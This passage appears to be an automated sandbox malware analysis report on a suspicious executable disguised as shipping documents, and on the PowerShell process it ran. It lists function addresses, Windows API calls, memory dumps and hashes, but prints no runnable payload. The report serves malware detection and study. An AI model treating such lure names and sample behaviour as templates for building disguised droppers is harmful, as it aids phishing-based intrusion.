                                        • Instruction ID: 9291db8f65f8f9a8906298ccab22143765a9ea5c3e1cf5a275661437a5304794
                                        • Opcode Fuzzy Hash: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                        • Instruction Fuzzy Hash: 22F08970602A21AFC6306F50FE09A9B7F68FB45B52B51053AF445B11ACCB345C91CB9D
                                        Function 00405550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 0040557F
                                        • CallWindowProcW.USER32(?,?,?,?), ref: 004055D0
                                          • Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Window$CallMessageProcSendVisible
                                        • String ID:
                                        • API String ID: 3748168415-3916222277
                                        • Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                        • Instruction ID: 994decb8795c597c60d879b60f38f30bda4d2919c1ffc13ce94f3a2918c86729
                                        • Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                        • Instruction Fuzzy Hash: 1C01717120060CBFEF219F11DD84A9B3B67EB84794F144037FA41761D5C7398D529A6D
                                        Function 6FE81948 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharNextExA.USER32(?,0000000A,00000000,6FE830B8,?,6FE816EA,?,00000002,00000002,0000000A), ref: 6FE81974
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2153670485.000000006FE81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FE80000, based on PE: true
                                        • Associated: 00000000.00000002.2153651950.000000006FE80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.2153686664.000000006FE82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.2153704607.000000006FE83000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.2153723885.000000006FE84000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fe80000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CharNext
                                        • String ID: $
                                        • API String ID: 3213498283-227171996
                                        • Opcode ID: bc7e8b98023c9ada11283eeb0a35410fa21bb8c9d436d133f542956f939d57e4
                                        • Instruction ID: 2998c5211304112072dd6cd35d258ba60c85a0f2d6639b027acd9b613298cbf6
                                        • Opcode Fuzzy Hash: bc7e8b98023c9ada11283eeb0a35410fa21bb8c9d436d133f542956f939d57e4
                                        • Instruction Fuzzy Hash: 69F01C311083CA9ADF11DF54C824BEA7FA9AF16248F540458FDA48B282C775E629C7A1
                                        Function 00403B94 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • FreeLibrary.KERNEL32(?,76233420,00000000,C:\Users\user\AppData\Local\Temp\,00403B6C,00403A82,?,?,00000008,0000000A,0000000C), ref: 00403BAE
                                        • GlobalFree.KERNEL32(00000000), ref: 00403BB5
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B94
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Free$GlobalLibrary
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 1100898210-3936084776
                                        • Opcode ID: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                        • Instruction ID: cb28855b84c3abb27e6c937247341fa4f051846acd49e0d4b6103447305c23c4
                                        • Opcode Fuzzy Hash: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                        • Instruction Fuzzy Hash: 5DE0C23362083097C6311F55EE04B1A7778AF89B2AF01402AEC407B2618B74AC538FCC
                                        Function 00405E72 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe,C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe,80000000,00000003), ref: 00405E78
                                        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe,C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe,80000000,00000003), ref: 00405E88
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrlen
                                        • String ID: C:\Users\user\Desktop
                                        • API String ID: 2709904686-3125694417
                                        • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                        • Instruction ID: c6f1eefeac9f22653a6718740f6635ad40246fc98af2d22d27e4b5974eb8f820
                                        • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                        • Instruction Fuzzy Hash: E1D0A7B3400930EEC312AB04EC04DAF73ACEF123007868827F980A7165D7785D81C6EC
                                        Function 6FE81A61 Relevance: 5.0, APIs: 4, Instructions: 45stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenW.KERNEL32(?,7622F360,00000000,00000000,?,?,6FE81295,00000000,/TIMEOUT=,00000000), ref: 6FE81A71
                                        • lstrlenW.KERNEL32(?,?,?,6FE81295,00000000,/TIMEOUT=,00000000), ref: 6FE81A7C
                                        • lstrcmpiW.KERNEL32(?,?,?,?,6FE81295,00000000,/TIMEOUT=,00000000), ref: 6FE81A9A
                                        • lstrlenW.KERNEL32(00000000,?,?,6FE81295,00000000,/TIMEOUT=,00000000), ref: 6FE81AB5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2153670485.000000006FE81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FE80000, based on PE: true
                                        • Associated: 00000000.00000002.2153651950.000000006FE80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.2153686664.000000006FE82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.2153704607.000000006FE83000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.2153723885.000000006FE84000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fe80000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: lstrlen$lstrcmpi
                                        • String ID:
                                        • API String ID: 1808961391-0
                                        • Opcode ID: f9062b3d7601ce68e37680be98a692450ad3d6c70f1ab5131483b6045cc4b89a
                                        • Instruction ID: cbdf79f4265768bab3dd61839a7f9ae1ebf40efe2243754549fd8bc746b9fa9e
                                        • Opcode Fuzzy Hash: f9062b3d7601ce68e37680be98a692450ad3d6c70f1ab5131483b6045cc4b89a
                                        • Instruction Fuzzy Hash: 7E018635200518BFDB01AFE5DC80C9D7BE8EF463A472140AAFD28D7210D774DA41DB90
                                        Function 00405FAC Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FD4
                                        • CharNextA.USER32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE5
                                        • lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: lstrlen$CharNextlstrcmpi
                                        • String ID:
                                        • API String ID: 190613189-0
                                        • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                        • Instruction ID: e9567a821587a5f0376c4e2be66d4cfc8c6f540c5076303c4651ac02cb4e93c6
                                        • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                        • Instruction Fuzzy Hash: E1F09631105519FFC7029FA5DE00D9FBBA8EF05350B2540B9F840F7250D678DE01AB69

                                        Executed Functions

                                        Function 0424EAE0 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2769613516.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_4240000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: \Vhk
                                        • API String ID: 0-3219809403
                                        • Opcode ID: 6bdc0069be621edb67a23c57be21e62416a366648cc2551d1f6608402a97f677
                                        • Instruction ID: afd0b99485ec290131d1122aac18d62b339b02f39093bbdbf1cdcc01bfaa6d96
                                        • Opcode Fuzzy Hash: 6bdc0069be621edb67a23c57be21e62416a366648cc2551d1f6608402a97f677
                                        • Instruction Fuzzy Hash: 1DB13C70F1020ACFEB14CFA9C8857ADBBF6FF88714F158529D815A7254EB74A845CB81
                                        Function 0424F3B0 Relevance: .3, Instructions: 266COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2769613516.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_4240000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4b7dd0ff555aa43cb9fd062c577ebdcffa18e7cb18e5749f07c3cc6aa903c98a
                                        • Instruction ID: 06cb84212389214c752c08cd998c3b46c972047e9b0d57647937b46aa9b23897
                                        • Opcode Fuzzy Hash: 4b7dd0ff555aa43cb9fd062c577ebdcffa18e7cb18e5749f07c3cc6aa903c98a
                                        • Instruction Fuzzy Hash: 92B18C70F1020ACFDB58CFA8DA8179DBBF2EFC8314F158529D814AB254EB74A845CB81
                                        Function 04247810 Relevance: .1, Instructions: 110COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2769613516.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_4240000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bb52b852e96cc675503fd2873d446ff65ad8b673b29d5ef0becddbe521d1790e
                                        • Instruction ID: 3df5f7aae8d16bbe88734359d72a63d12ee59afdc7403455085565dd4b11d7aa
                                        • Opcode Fuzzy Hash: bb52b852e96cc675503fd2873d446ff65ad8b673b29d5ef0becddbe521d1790e
                                        • Instruction Fuzzy Hash: FB415A34B002158FDB18DF64C958AAEBBF6EFC8754F144868E416EB7A0DB35AD41CB90
                                        Function 0424AFE8 Relevance: 6.8, Strings: 5, Instructions: 518COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2769613516.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_4240000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 8Nhk$h]hk$h]hk$h]hk$Ihk
                                        • API String ID: 0-2620401904
                                        • Opcode ID: d41b0ce3af9a3993043373d417f3f1aafe0262f236d4e75ff636e843a83196dc
                                        • Instruction ID: e26a6e72c1a7fce39c713150ef61ee9af6fcc0ef9419b9c65737c412754feb7f
                                        • Opcode Fuzzy Hash: d41b0ce3af9a3993043373d417f3f1aafe0262f236d4e75ff636e843a83196dc
                                        • Instruction Fuzzy Hash: 0A225030B111188FCB29DB25C8946AEBBB6EFC9304F1480A9D50AAB351DF35ED45CF95
                                        Function 0424F11C Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2769613516.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_4240000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: \Vhk$\Vhk
                                        • API String ID: 0-2443416373
                                        • Opcode ID: d674996c8f566d8f1754b782d2bc51c924c14a24f6afd9d3971574158bb106fd
                                        • Instruction ID: 449d669da624a4333670a60461b66214f12008a3e2bd8266748c728aa8deba2e
                                        • Opcode Fuzzy Hash: d674996c8f566d8f1754b782d2bc51c924c14a24f6afd9d3971574158bb106fd
                                        • Instruction Fuzzy Hash: F47168B0E1024ADFDB18CFA8C98179EBBF2EFC8714F158129E405A7254EB74A841CB91
                                        Function 0424F128 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2769613516.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_4240000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: \Vhk$\Vhk
                                        • API String ID: 0-2443416373
                                        • Opcode ID: e1c812de7a248eafdb718380bdc8a4c17610e7a6407d8e7a588a0153491ccfe0
                                        • Instruction ID: 39bead36459bc3590f92b4e4315d590acc37a8e2a68da3d485a11b4ef85df581
                                        • Opcode Fuzzy Hash: e1c812de7a248eafdb718380bdc8a4c17610e7a6407d8e7a588a0153491ccfe0
                                        • Instruction Fuzzy Hash: 64715970E1024ADFDF18CFA9C98179EBBF2EFC8714F158129E405A7254EB74A841CB91
                                        Function 0424BCA0 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2769613516.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_4240000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: h]hk$Ihk
                                        • API String ID: 0-236979794
                                        • Opcode ID: 1fc678d425a1c4aa1bc4a8608a03a03c94938ad73c3a628a4034a6c54fd17747
                                        • Instruction ID: 719707f2afd4ecea147b43d7bb7acb0225062d746e1ee5de29f04398c28202d9
                                        • Opcode Fuzzy Hash: 1fc678d425a1c4aa1bc4a8608a03a03c94938ad73c3a628a4034a6c54fd17747
                                        • Instruction Fuzzy Hash: 6A313B30B151188FCB2ADB74C8956EEB7B2AF89304F1444E9D509AB351CB35EE81CF91
                                        Function 0424EAD4 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2769613516.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_4240000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: \Vhk
                                        • API String ID: 0-3219809403
                                        • Opcode ID: c63121af17aa299cb02e37e470ac818b4f67ff42265394809a270b9dc8ca630b
                                        • Instruction ID: 2b7ab29dfde218dc1697b26d3c6d677c23db6bc8a9976462f539aacd7938cd23
                                        • Opcode Fuzzy Hash: c63121af17aa299cb02e37e470ac818b4f67ff42265394809a270b9dc8ca630b
                                        • Instruction Fuzzy Hash: 10B13A70E1020ACFEB14CFA8C88579EBBF6FF88714F158529E815E7254EB74A845CB91
                                        Function 06EF49A0 Relevance: 1.1, Instructions: 1099COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f9891508559a5ae2624598bd7c09dc4be87318655c1383fe2676bc630c566f97
                                        • Instruction ID: 99e4e0e6d99df18f5ad206f67f6a56ac966e1844b849d0b4dbe6aa0f8a895e7c
                                        • Opcode Fuzzy Hash: f9891508559a5ae2624598bd7c09dc4be87318655c1383fe2676bc630c566f97
                                        • Instruction Fuzzy Hash: 1DA2A270B10314CFEB64CB68C444B9ABBB2AF94718F209199DA15AF396CB72DD41CF91
                                        Function 06EF497E Relevance: .9, Instructions: 894COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 650ea2d014894bed017ff77f7cb225cec8219e4db87afb34a2fa197ba102efd7
                                        • Instruction ID: 6065f1831766c8151a1f2151d6a696826a68e32015501c27de5dca99722fddb2
                                        • Opcode Fuzzy Hash: 650ea2d014894bed017ff77f7cb225cec8219e4db87afb34a2fa197ba102efd7
                                        • Instruction Fuzzy Hash: B182A370A10311CFEB60CB54C444B9ABBB2EF94718F248199E915AF396CB76EE41CF61
                                        Function 06EF33B0 Relevance: .8, Instructions: 826COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 08ae0eb61798c4e01b3b4ea8942c0e23e602fe7b9b8cc02d7e3a59ca070ea761
                                        • Instruction ID: 5b377651b8355a0c06a945adeeb6ac530f5f10ea8b419a716cb146164e6e6b99
                                        • Opcode Fuzzy Hash: 08ae0eb61798c4e01b3b4ea8942c0e23e602fe7b9b8cc02d7e3a59ca070ea761
                                        • Instruction Fuzzy Hash: 51728D70B10214CFE754DB58C854BAABBB2AFC4714F14D099EA099F392DB72DD41CBA2
                                        Function 06EF3F9A Relevance: .6, Instructions: 644COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f3dcf7ce2cf3d5b6a8aa6e12544f9e3213c96df4003004d2e6d052605f1dc3d6
                                        • Instruction ID: 86e53b7bde2fa3577ef3b35b11b4745a81ce21b1d5d90dfd0448d3c069891eb0
                                        • Opcode Fuzzy Hash: f3dcf7ce2cf3d5b6a8aa6e12544f9e3213c96df4003004d2e6d052605f1dc3d6
                                        • Instruction Fuzzy Hash: F6525E70B10214CFE750DB58C855F5ABBB2ABC4714F14D099EA099B392DB72ED818FA2
                                        Function 06EFCCBB Relevance: .6, Instructions: 621COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fc6a41b38368f57f40435980715701f7e7679b06a0ae60933264b1022cd1a07f
                                        • Instruction ID: 7b16d1cfeb95b82bff9781ec41e8bcb7d88acce415fe5a6c6a0e1fcc04633dc9
                                        • Opcode Fuzzy Hash: fc6a41b38368f57f40435980715701f7e7679b06a0ae60933264b1022cd1a07f
                                        • Instruction Fuzzy Hash: 46424D70B10214DFD754DB58C850FAABBA2BFC9704F108098E919AF391DB72ED828F95
                                        Function 06EF40FF Relevance: .6, Instructions: 608COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3531e289b3e1bb3df5c59873ac25b95536b87d50ed43e1edbb7ac7cbf60ae769
                                        • Instruction ID: e02d6e41e33c7b10f538a3b2f2cb70580d7645072cf30582d9d727051addde1d
                                        • Opcode Fuzzy Hash: 3531e289b3e1bb3df5c59873ac25b95536b87d50ed43e1edbb7ac7cbf60ae769
                                        • Instruction Fuzzy Hash: 77425D70B10215CFE754DB58C855F9ABBB2ABC4714F109098EA099F392DB72ED818FA1
                                        Function 06EFC4C8 Relevance: .5, Instructions: 504COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5f4fd737fb9e25d3221cfdc0dd7af8e60f614dec2212f4841a044d4c971fe9f2
                                        • Instruction ID: 3464c093104b78987cc1308433c55a1c4f11e4c0bf56cf700a85b3cc271eeae1
                                        • Opcode Fuzzy Hash: 5f4fd737fb9e25d3221cfdc0dd7af8e60f614dec2212f4841a044d4c971fe9f2
                                        • Instruction Fuzzy Hash: 8C224C70B102149FD754DB58C854F9ABBA2FFC9704F508098EA09AF391CB72ED828F95
                                        Function 06EF40AB Relevance: .5, Instructions: 487COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6cca76c990127782b271485efb63172e16d1e0c0b1f38db9884c3b2e2eb6ae94
                                        • Instruction ID: 84a6d3748ad4cf4fe641e9f2ecd08585525e3a83df85742217839097ad6fd494
                                        • Opcode Fuzzy Hash: 6cca76c990127782b271485efb63172e16d1e0c0b1f38db9884c3b2e2eb6ae94
                                        • Instruction Fuzzy Hash: FC226E70B10214DFD750DB58C854F9ABBB2EB84714F10D098EA099F392DB72ED818FA2
                                        Function 06EF13B0 Relevance: .5, Instructions: 484COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 50970274ae1c97ca25a2a4f36feffe6659ba885ea101c91dc5fc6b441d8cc3ac
                                        • Instruction ID: 380052b7610d00209307d01ccde7d670b9f1d03970532242b35f201eada63592
                                        • Opcode Fuzzy Hash: 50970274ae1c97ca25a2a4f36feffe6659ba885ea101c91dc5fc6b441d8cc3ac
                                        • Instruction Fuzzy Hash: 5212AF70B11358DFEB54CB98D444B9ABBB2AFC4708F148069EA05AF391CB72ED41CB91
                                        Function 06EFCDA2 Relevance: .5, Instructions: 469COMMON
                                        Download Yara Rule
                                        Memory Dump Source
